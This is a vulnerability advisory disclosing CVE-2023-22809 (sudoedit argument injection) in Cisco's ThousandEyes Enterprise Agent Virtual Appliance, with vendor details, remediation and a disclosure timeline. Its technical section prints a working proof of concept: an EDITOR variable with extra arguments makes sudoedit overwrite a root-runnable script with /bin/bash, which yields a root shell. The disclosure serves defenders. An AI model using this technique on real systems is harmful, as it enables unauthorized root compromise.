Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit

Vulnerability Details

Affected Vendor: ThousandEyes
Affected Product: ThousandEyes Enterprise Agent Virtual Appliance
Affected Version: thousandeyes-va-64-18.04 0.218
Platform: Linux / Ubuntu 18.04
CWE Classification: CWE-1395: Dependency on Vulnerable
Third-Party Component
CVE ID: CVE-2023-22809

Vulnerability Description

An unpatched vulnerability in ‘sudoedit’, allowed by sudo
configuration, permits a low-privilege user to modify arbitrary
files as root and subsequently execute arbitrary commands as
root.

Technical Description

The ThousandEyes Virtual Appliance is distributed with
a restrictive set of commands that can be executed via
sudo, without having to provide the password for the
‘thousandeyes’ account. However, the ability to execute
sudoedit of a specific file (/etc/hosts) via sudo is permitted
without requiring the password. The sudoedit binary can
be abused to allow the modification of any file on the
filesystem. This is a known security vulnerability (per
https://seclists.org/oss-sec/2023/q1/42), but had not been
disclosed for the ThousandEyes Virtual Appliance. This can be
abused to allow root-level compromise of the virtual appliance.

thousandeyes@thousandeyes-va:~$ id
uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
thousandeyes@thousandeyes-va:~$ sudo -l
Matching Defaults entries for thousandeyes on thousandeyes-va:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User thousandeyes may run the following commands on thousandeyes-va:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop
te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart
te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,
/usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install
te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-, /usr/local/bin/te-, /usr/local/sbin/te-*
(root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump

Here we see that /usr/local/bin/te-* are executable as root with no
password. Even though sudoedit is only permitted to edit /etc/hosts,
we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one
of those scripts because we can then execute it:

thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
/usr/local/bin/te-set-config: Python script, ASCII text executable
thousandeyes@thousandeyes-va:~$ EDITOR=‘vim – /usr/local/bin/te-set-config’ sudoedit /etc/hosts
sudoedit: --: editing files in a writable directory is not permitted
2 files to edit
sudoedit: /etc/hosts unchanged
thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config
/usr/local/bin/te-set-config: ASCII text
thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config
/bin/bash
thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config
root@thousandeyes-va:~# id
uid=0(root) gid=0(root) groups=0(root)
root@thousandeyes-va:~#

Mitigation and Remediation Recommendation

The vendor has released a version which remediates the described
vulnerability. Release notes are available at:

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994

Credit

This vulnerability was discovered by Jim Becher of
KoreLogic, Inc.

Disclosure Timeline

2023.04.26 - KoreLogic submits vulnerability details to Cisco.
2023.04.26 - Cisco acknowledges receipt and the intention to
investigate.
2023.05.04 - Cisco notifies KoreLogic that a remediation for this
vulnerability is expected to be available within
90 days.
2023.06.30 - 45 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2023.07.11 - Cisco informs KoreLogic that the issue has been
remediated in the latest ThousandEyes Virtual
Appliance and a Third Party Software Release Note
Enclosure will be released 2023.08.16. Cisco
provides CVE-2023-22809 to track this vulnerability.
2023.07.24 - 60 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2023.08.16 - Cisco public acknowledgement.
2023.08.17 - KoreLogic public disclosure.

Proof of Concept

See 3. Technical Description.